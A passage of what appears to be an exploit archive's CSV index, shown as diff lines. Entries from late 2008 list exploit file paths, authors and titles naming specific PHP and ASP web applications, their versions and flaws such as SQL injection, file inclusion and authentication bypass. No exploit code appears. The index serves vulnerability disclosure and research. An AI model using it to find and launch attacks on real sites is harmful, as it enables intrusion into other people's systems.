Bypass",2008-11-30,R3d-D3V!L,webapps,php, +7301,exploits/php/webapps/7301.txt,"Active Time Billing 3.2 - Authentication Bypass",2008-11-30,AlpHaNiX,webapps,php, +7302,exploits/php/webapps/7302.txt,"Active Business Directory 2 - Blind SQL Injection",2008-11-30,AlpHaNiX,webapps,php, +7303,exploits/php/webapps/7303.txt,"Quick Tree View .NET 3.1 - Database Disclosure",2008-11-30,Cyber-Zone,webapps,php, +7304,exploits/php/webapps/7304.pl,"KTP Computer Customer Database CMS 1.0 - Local File Inclusion",2008-11-30,"CWH Underground",webapps,php, +7305,exploits/php/webapps/7305.txt,"KTP Computer Customer Database CMS 1.0 - Blind SQL Injection",2008-11-30,"CWH Underground",webapps,php, +7306,exploits/php/webapps/7306.txt,"minimal ablog 0.4 - SQL Injection / Arbitrary File Upload / Authentication Bypass",2008-11-30,NoGe,webapps,php, +7308,exploits/php/webapps/7308.txt,"CPCommerce 1.2.6 - URL Rewrite Input Variable Overwrite / Authentication Bypass",2008-11-30,girex,webapps,php, +7310,exploits/php/webapps/7310.txt,"Broadcast Machine 0.1 - Multiple Remote File Inclusions",2008-11-30,NoGe,webapps,php, +7311,exploits/php/webapps/7311.txt,"z1exchange 1.0 - 'site' SQL Injection",2008-12-01,JIKO,webapps,php, +7312,exploits/php/webapps/7312.txt,"Andy's PHP KnowledgeBase 0.92.9 - Arbitrary File Upload",2008-12-01,"CWH Underground",webapps,php, +7315,exploits/php/webapps/7315.txt,"E.Z. Poll 2 - Authentication Bypass",2008-12-01,t0fx,webapps,php, +7316,exploits/asp/webapps/7316.txt,"ASPPortal 3.2.5 - Database Disclosure",2008-12-01,"CWH Underground",webapps,asp, +7317,exploits/php/webapps/7317.pl,"bcoos 1.0.13 - 'viewcat.php' SQL Injection",2008-12-01,"CWH Underground",webapps,php, +7318,exploits/php/webapps/7318.txt,"PacPoll 4.0 - Database Disclosure",2008-12-01,AlpHaNiX,webapps,php, +7319,exploits/php/webapps/7319.txt,"Ocean12 Mailing List Manager Gold - File Disclosure / SQL Injection / Cross-Site Scripting",2008-12-02,Pouya_Server,webapps,php, +7322,exploits/php/webapps/7322.pl,"CMS MAXSITE Component Guestbook - Remote Command Execution",2008-12-02,"CWH Underground",webapps,php, +7323,exploits/php/webapps/7323.txt,"SunByte e-Flower - 'id' SQL Injection",2008-12-02,w4rl0ck,webapps,php, +7324,exploits/php/webapps/7324.txt,"Rapid Classified 3.1 - Database Disclosure",2008-12-02,CoBRa_21,webapps,php, +7325,exploits/asp/webapps/7325.txt,"Codefixer MailingListPro - Database Disclosure",2008-12-02,AlpHaNiX,webapps,asp, +7326,exploits/asp/webapps/7326.txt,"Gallery MX 2.0.0 - Blind SQL Injection",2008-12-03,R3d-D3V!L,webapps,asp, +7327,exploits/asp/webapps/7327.txt,"Calendar MX Professional 2.0.0 - Blind SQL Injection",2008-12-03,R3d-D3V!L,webapps,asp, +7328,exploits/php/webapps/7328.pl,"Check New 4.52 - SQL Injection",2008-12-03,"CWH Underground",webapps,php, +7331,exploits/php/webapps/7331.pl,"Joomla! Component JMovies 1.1 - 'id' SQL Injection",2008-12-03,StAkeR,webapps,php, +7332,exploits/php/webapps/7332.txt,"ASP User Engine .NET - Remote Database Disclosure",2008-12-03,AlpHaNiX,webapps,php, +7333,exploits/php/webapps/7333.txt,"Rae Media Contact MS - Authentication Bypass",2008-12-03,b3hz4d,webapps,php, +7335,exploits/php/webapps/7335.txt,"Multi SEO phpBB 1.1.0 - Remote File Inclusion",2008-12-03,NoGe,webapps,php, +7336,exploits/php/webapps/7336.txt,"ccTiddly 1.7.4 - 'cct_base' Remote File Inclusion",2008-12-04,cOndemned,webapps,php, +7337,exploits/php/webapps/7337.txt,"wbstreet 1.0 - SQL Injection / File Disclosure",2008-12-04,"CWH Underground",webapps,php, +7338,exploits/php/webapps/7338.txt,"User Engine Lite ASP - 'users.mdb' Database Disclosure",2008-12-04,AlpHaNiX,webapps,php, +7339,exploits/php/webapps/7339.txt,"template creature - SQL Injection / File Disclosure",2008-12-04,ZoRLu,webapps,php, +7340,exploits/asp/webapps/7340.txt,"Easy News Content Management - Database Disclosure",2008-12-04,BeyazKurt,webapps,asp, +7341,exploits/php/webapps/7341.txt,"lcxbbportal 0.1 alpha 2 - Remote File Inclusion",2008-12-04,NoGe,webapps,php, +7342,exploits/php/webapps/7342.txt,"My Simple Forum 3.0 - Local File Inclusion",2008-12-04,cOndemned,webapps,php, +7343,exploits/php/webapps/7343.txt,"Joomla! Component mydyngallery 1.4.2 - SQL Injection",2008-12-04,"Khashayar Fereidani",webapps,php, +7344,exploits/php/webapps/7344.txt,"Gravity GTD 0.4.5 - Local File Inclusion / Remote Code Execution",2008-12-04,dun,webapps,php, +7345,exploits/php/webapps/7345.txt,"BNCwi 1.04 - Local File Inclusion",2008-12-04,dun,webapps,php, +7346,exploits/php/webapps/7346.txt,"Multiple Membership Script 2.5 - 'id' SQL Injection",2008-12-05,ViRuS_HaCkErS,webapps,php, +7348,exploits/asp/webapps/7348.txt,"merlix educate servert - Authentication Bypass / File Disclosure",2008-12-05,ZoRLu,webapps,asp, +7349,exploits/asp/webapps/7349.txt,"RankEm - 'siteID' SQL Injection",2008-12-05,AlpHaNiX,webapps,asp, +7350,exploits/asp/webapps/7350.txt,"Rankem - Authentication Bypass",2008-12-05,AlpHaNiX,webapps,asp, +7351,exploits/php/webapps/7351.txt,"nightfall personal diary 1.0 - Cross-Site Scripting / File Disclosure",2008-12-05,AlpHaNiX,webapps,php, +7352,exploits/php/webapps/7352.txt,"Merlix Teamworx Server - File Disclosure/Bypass",2008-12-05,ZoRLu,webapps,php, +7353,exploits/asp/webapps/7353.txt,"Cold BBS - Remote Database Disclosure",2008-12-05,ahmadbady,webapps,asp, +7354,exploits/php/webapps/7354.txt,"Tizag Countdown Creator 3 - Insecure Upload",2008-12-05,ahmadbady,webapps,php, +7356,exploits/asp/webapps/7356.txt,"ASP AutoDealer - SQL Injection / File Disclosure",2008-12-05,AlpHaNiX,webapps,asp, +7357,exploits/asp/webapps/7357.txt,"ASP Portal - Multiple SQL Injections",2008-12-05,AlpHaNiX,webapps,asp, +7359,exploits/asp/webapps/7359.txt,"ASPTicker 1.0 - Remote Database Disclosure",2008-12-05,ZoRLu,webapps,asp, +7360,exploits/asp/webapps/7360.txt,"ASP AutoDealer - Remote Database Disclosure",2008-12-06,ZoRLu,webapps,asp, +7361,exploits/asp/webapps/7361.txt,"ASP PORTAL - Remote Database Disclosure",2008-12-06,ZoRLu,webapps,asp, +7363,exploits/php/webapps/7363.txt,"phpPgAdmin 4.2.1 - '_language' Local File Inclusion",2008-12-06,dun,webapps,php, +7364,exploits/php/webapps/7364.php,"IPNPro3 < 1.44 - Admin Password Changing",2008-12-07,G4N0K,webapps,php, +7365,exploits/php/webapps/7365.php,"DL PayCart 1.34 - Admin Password Changing",2008-12-07,G4N0K,webapps,php, +7366,exploits/php/webapps/7366.php,"Bonza Cart 1.10 - Admin Password Changing",2008-12-07,G4N0K,webapps,php, +7367,exploits/php/webapps/7367.php,"PayPal eStore - Admin Password Change",2008-12-07,G4N0K,webapps,php, +7368,exploits/php/webapps/7368.txt,"Product Sale Framework 0.1b - SQL Injection",2008-12-07,b3hz4d,webapps,php, +7369,exploits/php/webapps/7369.pl,"w3blabor CMS 3.0.5 - Arbitrary File Upload / Local File Inclusion",2008-12-07,DNX,webapps,php, +7370,exploits/asp/webapps/7370.txt,"Natterchat 1.12 - Database Disclosure",2008-12-07,AlpHaNiX,webapps,asp, +7371,exploits/asp/webapps/7371.txt,"Professional Download Assistant 0.1 - Database Disclosure",2008-12-07,"Ghost Hacker",webapps,asp, +7372,exploits/asp/webapps/7372.txt,"Ikon ADManager 2.1 - Remote Database Disclosure",2008-12-07,"Ghost Hacker",webapps,asp, +7373,exploits/asp/webapps/7373.txt,"aspmanage banners - Arbitrary File Upload / File Disclosure",2008-12-07,ZoRLu,webapps,asp, +7374,exploits/php/webapps/7374.txt,"Mini Blog 1.0.1 - 'index.php' Multiple Local File Inclusions",2008-12-07,cOndemned,webapps,php, +7375,exploits/php/webapps/7375.txt,"Mini-CMS 1.0.1 - 'index.php' Local File Inclusion",2008-12-07,cOndemned,webapps,php, +7376,exploits/asp/webapps/7376.txt,"QMail Mailing List Manager 1.2 - Database Disclosure",2008-12-07,"Ghost Hacker",webapps,asp, +7377,exploits/php/webapps/7377.txt,"PHPmyGallery Gold 1.51 - 'index.php' Directory Traversal",2008-12-07,zAx,webapps,php, +7378,exploits/asp/webapps/7378.txt,"asp talk - SQL Injection / Cross-Site Scripting",2008-12-07,Bl@ckbe@rD,webapps,asp, +7379,exploits/php/webapps/7379.txt,"MG2 0.5.1 - 'filename' Remote Code Execution",2008-12-08,"Alfons Luja",webapps,php, +7380,exploits/php/webapps/7380.txt,"XOOPS 2.3.1 - Multiple Local File Inclusions",2008-12-08,DSecRG,webapps,php, +7381,exploits/php/webapps/7381.txt,"siu guarani - Multiple Vulnerabilities",2008-12-08,"Ubik & proudhon",webapps,php, +7382,exploits/php/webapps/7382.txt,"phpMyAdmin 3.1.0 - Cross-Site Request Forgery / SQL Injection",2008-12-08,"Michael Brooks",webapps,php, +7383,exploits/php/webapps/7383.txt,"Simple Directory Listing 2 - Cross-Site Arbitrary File Upload",2008-12-08,"Michael Brooks",webapps,php, +7385,exploits/php/webapps/7385.txt,"vBulletin Secure Downloads 2.0.0r - SQL Injection",2008-12-08,Cnaph,webapps,php, +7386,exploits/php/webapps/7386.pl,"phpBB 3 - Mod Tag Board 4 Blind SQL Injection",2008-12-08,StAkeR,webapps,php, +7388,exploits/php/webapps/7388.txt,"webcaf 1.4 - Local File Inclusion / Remote Code Execution",2008-12-08,dun,webapps,php, +7390,exploits/asp/webapps/7390.txt,"Professional Download Assistant 0.1 - Authentication Bypass",2008-12-09,ZoRLu,webapps,asp, +7391,exploits/asp/webapps/7391.txt,"Poll Pro 2.0 - Authentication Bypass",2008-12-09,AlpHaNiX,webapps,asp, +7392,exploits/php/webapps/7392.txt,"PHPmyGallery 1.0beta2 - Local/Remote File Inclusion",2008-12-09,ZoRLu,webapps,php, +7395,exploits/php/webapps/7395.txt,"Peel Shopping 3.1 - 'rubid' SQL Injection",2008-12-09,SuB-ZeRo,webapps,php, +7396,exploits/php/webapps/7396.txt,"Netref 4.0 - Multiple SQL Injections",2008-12-09,SuB-ZeRo,webapps,php, +7397,exploits/php/webapps/7397.txt,"ProQuiz 1.0 - Authentication Bypass",2008-12-09,Osirys,webapps,php, +7398,exploits/asp/webapps/7398.txt,"postecards - SQL Injection / File Disclosure",2008-12-09,AlpHaNiX,webapps,asp, +7399,exploits/php/webapps/7399.txt,"PHPmyGallery 1.5beta - '/common-tpl-vars.php' Local/Remote File Inclusion",2008-12-09,CoBRa_21,webapps,php, +7400,exploits/php/webapps/7400.txt,"PHP Multiple Newsletters 2.7 - Local File Inclusion / Cross-Site Scripting",2008-12-09,ahmadbady,webapps,php, +7404,exploits/cgi/webapps/7404.txt,"HTMPL 1.11 - Command Execution",2008-12-10,ZeN,webapps,cgi, +7406,exploits/php/webapps/7406.php,"EZ Publish < 3.9.5/3.10.1/4.0.1 - Privilege Escalation",2008-12-10,s4avrd0w,webapps,php, +7407,exploits/php/webapps/7407.txt,"WebMaster Marketplace - SQL Injection",2008-12-10,"Hussin X",webapps,php, +7408,exploits/php/webapps/7408.txt,"living Local 1.1 - Cross-Site Scripting / Arbitrary File Upload",2008-12-10,Bgh7,webapps,php, +7409,exploits/php/webapps/7409.txt,"Pro Chat Rooms 3.0.2 - Cross-Site Scripting / Cross-Site Request Forgery",2008-12-10,ZynbER,webapps,php, +7411,exploits/php/webapps/7411.txt,"Butterfly ORGanizer 2.0.1 - 'id' SQL Injection",2008-12-10,Osirys,webapps,php, +7412,exploits/asp/webapps/7412.txt,"cf shopkart 5.2.2 - SQL Injection / File Disclosure",2008-12-10,AlpHaNiX,webapps,asp, +7413,exploits/asp/webapps/7413.pl,"CF_Calendar - 'calendarevent.cfm' SQL Injection",2008-12-10,AlpHaNiX,webapps,asp, +7414,exploits/asp/webapps/7414.txt,"CF_Auction - Blind SQL Injection",2008-12-10,AlpHaNiX,webapps,asp, +7415,exploits/asp/webapps/7415.txt,"CFMBLOG - 'categorynbr' Blind SQL Injection",2008-12-10,AlpHaNiX,webapps,asp, +7416,exploits/asp/webapps/7416.txt,"CF_Forum - Blind SQL Injection",2008-12-10,AlpHaNiX,webapps,asp, +7417,exploits/php/webapps/7417.txt,"phpAddEdit 1.3 - 'editform' Local File Inclusion",2008-12-10,nuclear,webapps,php, +7418,exploits/php/webapps/7418.txt,"PhpAddEdit 1.3 - 'cookie' Authentication Bypass",2008-12-11,x0r,webapps,php, +7419,exploits/asp/webapps/7419.txt,"evCal Events Calendar - Database Disclosure",2008-12-11,Cyber-Zone,webapps,asp, +7420,exploits/asp/webapps/7420.txt,"MyCal Personal Events Calendar - Database Disclosure",2008-12-11,CoBRa_21,webapps,asp, +7421,exploits/php/webapps/7421.txt,"EZ Publish 3.9.0/3.9.5/3.10.1 - Command Execution (Admin Required)",2008-12-11,s4avrd0w,webapps,php, +7422,exploits/php/webapps/7422.txt,"Feed CMS 1.07.03.19b - 'lang' Local File Inclusion",2008-12-11,x0r,webapps,php, +7423,exploits/asp/webapps/7423.txt,"Affiliate Software Java 4.0 - Authentication Bypass",2008-12-11,R3d-D3V!L,webapps,asp, +7424,exploits/asp/webapps/7424.txt,"Ad Management Java - Authentication Bypass",2008-12-11,R3d-D3V!L,webapps,asp, +7425,exploits/asp/webapps/7425.txt,"Banner Exchange Java - Authentication Bypass",2008-12-11,R3d-D3V!L,webapps,asp, +7426,exploits/php/webapps/7426.txt,"PHP Support Tickets 2.2 - Arbitrary File Upload",2008-12-11,ahmadbady,webapps,php, +7427,exploits/asp/webapps/7427.txt,"The Net Guys ASPired2Poll - Remote Database Disclosure",2008-12-11,AlpHaNiX,webapps,asp, +7428,exploits/asp/webapps/7428.txt,"The Net Guys ASPired2Protect - Database Disclosure",2008-12-12,AlpHaNiX,webapps,asp, +7429,exploits/asp/webapps/7429.txt,"ASP-CMS 1.0 - 'cha' SQL Injection",2008-12-12,"Khashayar Fereidani",webapps,asp, +7430,exploits/php/webapps/7430.txt,"SUMON 0.7.0 - Command Execution",2008-12-12,dun,webapps,php, +7432,exploits/php/webapps/7432.txt,"Xpoze 4.10 - 'menu' Blind SQL Injection",2008-12-12,XaDoS,webapps,php, +7433,exploits/php/webapps/7433.txt,"Social Groupie - 'id' SQL Injection",2008-12-12,InjEctOr5,webapps,php, +7434,exploits/php/webapps/7434.sh,"Wysi Wiki Wyg 1.0 - Remote Password Retrieve",2008-12-12,StAkeR,webapps,php, +7435,exploits/php/webapps/7435.txt,"Social Groupie - 'create_album.php' Arbitrary File Upload",2008-12-12,InjEctOr5,webapps,php, +7436,exploits/asp/webapps/7436.txt,"the net guys aspired2blog - SQL Injection / File Disclosure",2008-12-12,Pouya_Server,webapps,asp, +7437,exploits/php/webapps/7437.txt,"Moodle 1.9.3 - Remote Code Execution",2008-12-12,USH,webapps,php, +7438,exploits/asp/webapps/7438.txt,"VP-ASP Shopping Cart 6.50 - Database Disclosure",2008-12-12,Dxil,webapps,asp, +7439,exploits/php/webapps/7439.txt,"Umer Inc Songs Portal Script - 'id' SQL Injection",2008-12-12,InjEctOr5,webapps,php, +7440,exploits/asp/webapps/7440.txt,"ColdFusion Scripts Red_Reservations - Database Disclosure",2008-12-12,Cyber-Zone,webapps,asp, +7441,exploits/php/webapps/7441.txt,"Joomla! Component live chat - SQL Injection / Open Proxy",2008-12-12,jdc,webapps,php, +7443,exploits/php/webapps/7443.txt,"FlexPHPNews 0.0.6 / PRO - Authentication Bypass",2008-12-14,Osirys,webapps,php, +7444,exploits/php/webapps/7444.txt,"Simple Text-File Login script (SiTeFiLo) 1.0.6 - File Disclosure / Remote File Inclusion",2008-12-14,Osirys,webapps,php, +7445,exploits/asp/webapps/7445.txt,"Discussion Web 4 - Remote Database Disclosure",2008-12-14,Pouya_Server,webapps,asp, +7446,exploits/asp/webapps/7446.txt,"ASPired2Quote - Remote Database Disclosure",2008-12-14,Pouya_Server,webapps,asp, +7447,exploits/asp/webapps/7447.txt,"ASP-DEV Internal E-Mail System - Authentication Bypass",2008-12-14,Pouya_Server,webapps,asp, +7448,exploits/php/webapps/7448.txt,"autositephp 2.0.3 - Local File Inclusion / Cross-Site Request Forgery / Edit File",2008-12-14,SirGod,webapps,php, +7449,exploits/php/webapps/7449.txt,"iyzi Forum 1.0b3 - Database Disclosure",2008-12-14,"Ghost Hacker",webapps,php, +7450,exploits/asp/webapps/7450.txt,"CodeAvalanche FreeForum - Database Disclosure",2008-12-14,"Ghost Hacker",webapps,asp, +7451,exploits/php/webapps/7451.txt,"PHP weather 2.2.2 - Local File Inclusion / Cross-Site Scripting",2008-12-14,ahmadbady,webapps,php, +7453,exploits/php/webapps/7453.txt,"FLDS 1.2a - 'redir.php' SQL Injection",2008-12-14,nuclear,webapps,php, +7455,exploits/php/webapps/7455.txt,"The Rat CMS Alpha 2 - 'download.php' Priviledge Escalation",2008-12-14,x0r,webapps,php, +7456,exploits/php/webapps/7456.txt,"AvailScript Article Script - Arbitrary File Upload",2008-12-14,S.W.A.T.,webapps,php, +7457,exploits/php/webapps/7457.txt,"AvailScript Classmate Script - Arbitrary File Upload",2008-12-14,S.W.A.T.,webapps,php, +7458,exploits/php/webapps/7458.txt,"Mediatheka 4.2 - 'lang' Local File Inclusion",2008-12-14,Osirys,webapps,php, +7459,exploits/php/webapps/7459.txt,"CFAGCMS 1 - Remote File Inclusion",2008-12-14,BeyazKurt,webapps,php, +7461,exploits/php/webapps/7461.txt,"Flatnux - html/JavaScript Injection Cookie Grabber",2008-12-14,gmda,webapps,php, +7462,exploits/asp/webapps/7462.txt,"ASPSiteWare Home Builder 1.0/2.0 - SQL Injection",2008-12-14,AlpHaNiX,webapps,asp, +7463,exploits/php/webapps/7463.txt,"ASPSiteWare Automotive Dealer 1.0/2.0 - SQL Injection",2008-12-14,AlpHaNiX,webapps,php, +7464,exploits/asp/webapps/7464.txt,"ASPSiteWare RealtyListing 1.0/2.0 - SQL Injection",2008-12-14,AlpHaNiX,webapps,asp, +7465,exploits/php/webapps/7465.txt,"isweb CMS 3.0 - SQL Injection / Cross-Site Scripting",2008-12-14,XaDoS,webapps,php, +7466,exploits/asp/webapps/7466.txt,"Forest Blog 1.3.2 - Remote Database Disclosure",2008-12-15,"Cold Zero",webapps,asp, +7468,exploits/asp/webapps/7468.txt,"CodeAvalanche Directory - Database Disclosure",2008-12-15,Pouya_Server,webapps,asp, +7469,exploits/asp/webapps/7469.txt,"CodeAvalanche FreeForAll - Database Disclosure",2008-12-15,Pouya_Server,webapps,asp, +7470,exploits/asp/webapps/7470.txt,"CodeAvalanche FreeWallpaper - Remote Database Disclosure",2008-12-15,Pouya_Server,webapps,asp, +7471,exploits/asp/webapps/7471.txt,"CodeAvalanche Articles - Database Disclosure",2008-12-15,Pouya_Server,webapps,asp, +7472,exploits/asp/webapps/7472.txt,"CodeAvalanche RateMySite - Database Disclosure",2008-12-15,Pouya_Server,webapps,asp, +7473,exploits/php/webapps/7473.php,"EZ Publish < 3.9.5/3.10.1/4.0.1 - 'token' Privilege Escalation",2008-12-15,s4avrd0w,webapps,php, +7474,exploits/php/webapps/7474.txt,"FLDS 1.2a - 'lpro.php' SQL Injection",2008-12-15,nuclear,webapps,php, +7475,exploits/php/webapps/7475.txt,"BabbleBoard 1.1.6 - Cross-Site Request Forgery/Cookie Grabber",2008-12-15,SirGod,webapps,php, +7476,exploits/php/webapps/7476.txt,"Mediatheka 4.2 - Blind SQL Injection",2008-12-15,StAkeR,webapps,php, +7478,exploits/php/webapps/7478.txt,"The Rat CMS Alpha 2 - Authentication Bypass",2008-12-15,x0r,webapps,php, +7479,exploits/php/webapps/7479.txt,"XOOPS Module Amevents - SQL Injection",2008-12-15,nétRoot,webapps,php, +7480,exploits/php/webapps/7480.txt,"CadeNix - SQL Injection",2008-12-15,HaCkeR_EgY,webapps,php, +7481,exploits/php/webapps/7481.txt,"WorkSimple 1.2.1 - Remote File Inclusion / Sensitive Data Disclosure",2008-12-15,Osirys,webapps,php, +7482,exploits/php/webapps/7482.txt,"Aperto Blog 0.1.1 - Local File Inclusion / SQL Injection",2008-12-15,NoGe,webapps,php, +7483,exploits/php/webapps/7483.txt,"CFAGCMS 1 - SQL Injection",2008-12-15,ZoRLu,webapps,php, +7484,exploits/asp/webapps/7484.txt,"Click&BaneX - Multiple SQL Injections",2008-12-15,AlpHaNiX,webapps,asp, +7485,exploits/asp/webapps/7485.txt,"clickandemail - SQL Injection / Cross-Site Scripting",2008-12-15,AlpHaNiX,webapps,asp, +7486,exploits/asp/webapps/7486.txt,"Click&Rank - SQL Injection / Cross-Site Scripting",2008-12-15,AlpHaNiX,webapps,asp, +7487,exploits/php/webapps/7487.txt,"FaScript FaUpload - SQL Injection",2008-12-16,"Aria-Security Team",webapps,php, +7488,exploits/asp/webapps/7488.txt,"Web Wiz Guestbook 8.21 - Database Disclosure",2008-12-16,"Cold Zero",webapps,asp, +7489,exploits/php/webapps/7489.pl,"FLDS 1.2a - 'report.php' SQL Injection",2008-12-16,ka0x,webapps,php, +7490,exploits/php/webapps/7490.php,"Aiyoota! CMS - Blind SQL Injection",2008-12-16,Lidloses_Auge,webapps,php, +7491,exploits/asp/webapps/7491.txt,"Nukedit 4.9.8 - Remote Database Disclosure",2008-12-16,Cyber.Zer0,webapps,asp, +7493,exploits/php/webapps/7493.txt,"Liberum Help Desk 0.97.3 - SQL Injection / File Disclosure",2008-12-16,"Cold Zero",webapps,php, +7494,exploits/php/webapps/7494.txt,"Zelta E Store - Arbitrary File Upload / Bypass / SQL Injection / Blind SQL Injection",2008-12-16,ZoRLu,webapps,php, +7495,exploits/asp/webapps/7495.txt,"Gnews Publisher .NET - SQL Injection",2008-12-16,AlpHaNiX,webapps,asp, +7497,exploits/php/webapps/7497.txt,"RSMScript 1.21 - Cross-Site Scripting / Insecure Cookie Handling",2008-12-17,Osirys,webapps,php, +7499,exploits/asp/webapps/7499.txt,"BP Blog 6.0/7.0/8.0/9.0 - Remote Database Disclosure",2008-12-17,Dxil,webapps,asp, +7500,exploits/php/webapps/7500.txt,"K&S Shopsysteme - Arbitrary File Upload",2008-12-17,mNt,webapps,php, +7502,exploits/php/webapps/7502.txt,"r.cms 2.0 - Multiple SQL Injections",2008-12-17,Lidloses_Auge,webapps,php, +7504,exploits/php/webapps/7504.txt,"Joomla! Component Tech Article 1.x - SQL Injection",2008-12-17,InjEctOr5,webapps,php, +7506,exploits/php/webapps/7506.txt,"TinyMCE 2.0.1 - 'menuID' SQL Injection",2008-12-17,AnGeL25dZ,webapps,php, +7507,exploits/php/webapps/7507.pl,"Lizardware CMS 0.6.0 - Blind SQL Injection",2008-12-17,StAkeR,webapps,php, +7508,exploits/asp/webapps/7508.txt,"QuickerSite Easy CMS - Database Disclosure",2008-12-17,AlpHaNiX,webapps,asp, +7509,exploits/php/webapps/7509.txt,"Mini File Host 1.x - Arbitrary '.PHP' File Upload",2008-12-18,Pouya_Server,webapps,php, +7510,exploits/php/webapps/7510.txt,"2532/Gigs 1.2.2 Stable - Multiple Vulnerabilities",2008-12-18,Osirys,webapps,php, +7511,exploits/php/webapps/7511.txt,"2532/Gigs 1.2.2 Stable - Remote Authentication Bypass",2008-12-18,StAkeR,webapps,php, +7512,exploits/php/webapps/7512.php,"2532/Gigs 1.2.2 Stable - Remote Command Execution",2008-12-18,StAkeR,webapps,php, +7513,exploits/php/webapps/7513.txt,"Calendar Script 1.1 - Insecure Cookie Handling",2008-12-18,Osirys,webapps,php, +7514,exploits/php/webapps/7514.txt,"I-Rater Basic - SQL Injection",2008-12-18,boom3rang,webapps,php, +7515,exploits/php/webapps/7515.txt,"phpclanwebsite 1.23.3 fix pack #5 - Multiple Vulnerabilities",2008-12-18,s4avrd0w,webapps,php, +7517,exploits/php/webapps/7517.txt,"Injader CMS 2.1.1 - 'id' SQL Injection",2008-12-18,fuzion,webapps,php, +7518,exploits/php/webapps/7518.txt,"Gobbl CMS 1.0 - Insecure Cookie Handling",2008-12-18,x0r,webapps,php, +7519,exploits/php/webapps/7519.txt,"MyPHPsite - Local File Inclusion",2008-12-18,Piker,webapps,php, +7522,exploits/php/webapps/7522.pl,"MyPBS - 'seasonID' SQL Injection",2008-12-19,Piker,webapps,php, +7523,exploits/php/webapps/7523.php,"ReVou Twitter Clone - Admin Password Change",2008-12-19,G4N0K,webapps,php, +7524,exploits/php/webapps/7524.txt,"Online Keyword Research Tool - 'download.php' File Disclosure",2008-12-19,"Cold Zero",webapps,php, +7525,exploits/php/webapps/7525.txt,"Extract Website - 'Filename' File Disclosure",2008-12-19,"Cold Zero",webapps,php, +7526,exploits/php/webapps/7526.txt,"myPHPscripts Login Session 2.0 - Cross-Site Scripting / Database Disclosure",2008-12-19,Osirys,webapps,php, +7527,exploits/php/webapps/7527.txt,"FreeLyrics 1.0 - Remote File Disclosure",2008-12-19,Piker,webapps,php, +7528,exploits/php/webapps/7528.pl,"OneOrZero helpdesk 1.6.x. - Arbitrary File Upload",2008-12-19,Ams,webapps,php, +7529,exploits/php/webapps/7529.txt,"Constructr CMS 3.02.5 stable - Multiple Vulnerabilities",2008-12-19,fuzion,webapps,php, +7530,exploits/php/webapps/7530.pl,"Userlocator 3.0 - Blind SQL Injection",2008-12-21,katharsis,webapps,php, +7531,exploits/php/webapps/7531.txt,"ReVou Twitter Clone - Arbitrary File Upload",2008-12-21,S.W.A.T.,webapps,php, +7532,exploits/php/webapps/7532.txt,"Chicomas 2.0.4 - Database Backup / File Disclosure / Cross-Site Scripting",2008-12-21,BugReport.IR,webapps,php, +7534,exploits/asp/webapps/7534.txt,"Emefa Guestbook 3.0 - Remote Database Disclosure",2008-12-21,Cyber.Zer0,webapps,asp, +7537,exploits/php/webapps/7537.txt,"BLOG 1.55B - 'image_upload.php' Arbitrary File Upload",2008-12-21,Piker,webapps,php, +7538,exploits/php/webapps/7538.txt,"Joomla! Component com_hbssearch 1.0 - Blind SQL Injection",2008-12-21,boom3rang,webapps,php, +7539,exploits/php/webapps/7539.txt,"Joomla! Component com_tophotelmodule 1.0 - Blind SQL Injection",2008-12-21,boom3rang,webapps,php, +7540,exploits/php/webapps/7540.txt,"phpg 1.6 - Cross-Site Scripting / Full Path Disclosure / Denial of Service",2008-12-21,"Anarchy Angel",webapps,php, +7541,exploits/php/webapps/7541.pl,"RSS Simple News - SQL Injection",2008-12-22,Piker,webapps,php, +7542,exploits/php/webapps/7542.txt,"Text Lines Rearrange Script - 'Filename' File Disclosure",2008-12-22,SirGod,webapps,php, +7543,exploits/php/webapps/7543.txt,"WordPress Plugin Page Flip Image Gallery 0.2.2 - Remote File Disclosure",2008-12-22,GoLd_M,webapps,php, +7544,exploits/php/webapps/7544.txt,"Pligg 9.9.5b - Arbitrary File Upload / SQL Injection",2008-12-22,Ams,webapps,php, +7545,exploits/php/webapps/7545.txt,"yourplace 1.0.2 - Multiple Vulnerabilities / Remote Code Execution",2008-12-22,Osirys,webapps,php, +7546,exploits/php/webapps/7546.txt,"Joomla! Component Volunteer 2.0 - SQL Injection",2008-12-22,boom3rang,webapps,php, +7548,exploits/php/webapps/7548.php,"SolarCMS 0.53.8 - 'Forum' Remote Cookies Disclosure",2008-12-22,StAkeR,webapps,php, +7549,exploits/php/webapps/7549.txt,"Roundcube Webmail 0.2-3 Beta - Code Execution",2008-12-22,"Jacobo Avariento",webapps,php, +7551,exploits/php/webapps/7551.txt,"Calendar Script 1.1 - Authentication Bypass",2008-12-22,StAkeR,webapps,php, +7552,exploits/php/webapps/7552.txt,"REDPEACH CMS - SQL Injection",2008-12-22,Lidloses_Auge,webapps,php, +7553,exploits/php/webapps/7553.sh,"Roundcube Webmail 0.2b - Remote Code Execution",2008-12-22,Hunger,webapps,php, +7557,exploits/php/webapps/7557.txt,"PHPmotion 2.1 - Cross-Site Request Forgery",2008-12-23,Ausome1,webapps,php, +7558,exploits/php/webapps/7558.txt,"PHPLD 3.3 - Blind SQL Injection",2008-12-23,fuzion,webapps,php, +7559,exploits/php/webapps/7559.php,"CMS NetCat 3.12 - 'password_recovery.php' Blind SQL Injection",2008-12-23,s4avrd0w,webapps,php, +7560,exploits/php/webapps/7560.txt,"CMS NetCat 3.12 - Multiple Vulnerabilities",2008-12-23,s4avrd0w,webapps,php, +7561,exploits/php/webapps/7561.txt,"phpGreetCards - Cross-Site Scripting / Arbitrary File Upload",2008-12-23,ahmadbady,webapps,php, +7562,exploits/php/webapps/7562.txt,"PHPAdBoard - PHP uploads Arbitrary File Upload",2008-12-23,ahmadbady,webapps,php, +7563,exploits/php/webapps/7563.txt,"phpEmployment - 'PHP Upload' Arbitrary File Upload",2008-12-23,ahmadbady,webapps,php, +7565,exploits/php/webapps/7565.txt,"StormBoard 1.0.1 - SQL Injection",2008-12-23,Samir-M,webapps,php, +7567,exploits/php/webapps/7567.txt,"Joomla! Component com_lowcosthotels - Blind SQL Injection",2008-12-23,"Hussin X",webapps,php, +7568,exploits/php/webapps/7568.txt,"Joomla! Component com_allhotels - Blind SQL Injection",2008-12-23,"Hussin X",webapps,php, +7569,exploits/php/webapps/7569.txt,"doop CMS 1.4.0b - Cross-Site Request Forgery / Arbitrary File Upload",2008-12-24,x0r,webapps,php, +7570,exploits/php/webapps/7570.txt,"ILIAS 3.7.4 - 'ref_id' Blind SQL Injection",2008-12-24,Lidloses_Auge,webapps,php, +7572,exploits/php/webapps/7572.txt,"Joomla! Component Ice Gallery 0.5b2 - 'catid' Blind SQL 